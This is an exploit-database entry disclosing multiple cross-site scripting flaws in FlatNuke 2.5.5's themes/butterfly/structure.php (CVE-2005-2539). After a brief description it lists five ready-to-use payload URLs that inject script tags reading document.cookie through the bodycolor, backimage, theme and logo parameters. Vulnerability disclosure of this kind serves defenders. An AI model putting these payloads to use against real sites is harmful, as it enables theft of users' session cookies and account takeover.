FlatNuke 2.5.5 - 'structure.php' Multiple Cross-Site Scripting Vulnerabilities
Author: rgod
type: webapps
platform: php
port:
date_added: 2005-08-05
date_updated: 2013-06-11
verified: 1
codes: CVE-2005-2539;OSVDB-18551
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/14483/info
FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to inject html and script code into the Web browser of an unsuspecting victim.The attacker may then steal cookie-based authentication credentials. Other attacks are also possible.
http://[target]/[path]/themes/butterfly/structure.php?bodycolor="><script>alert(document.cookie)</script>
http://[target]/[path]/themes/butterfly/structure.php?backimage="><script>alert(document.cookie)</script>
http://[target]/[path]/themes/butterfly/structure.php?backimage=whatever&theme="><script>alert(document.cookie)</script>
http://[target]/[path]/themes/butterfly/structure.php?backimage=whatever&bodycolor="><script>alert(document.cookie)</script>
http://[target]/[path]/themes/butterfly/structure.php?logo="><script>alert(document.cookie)</script>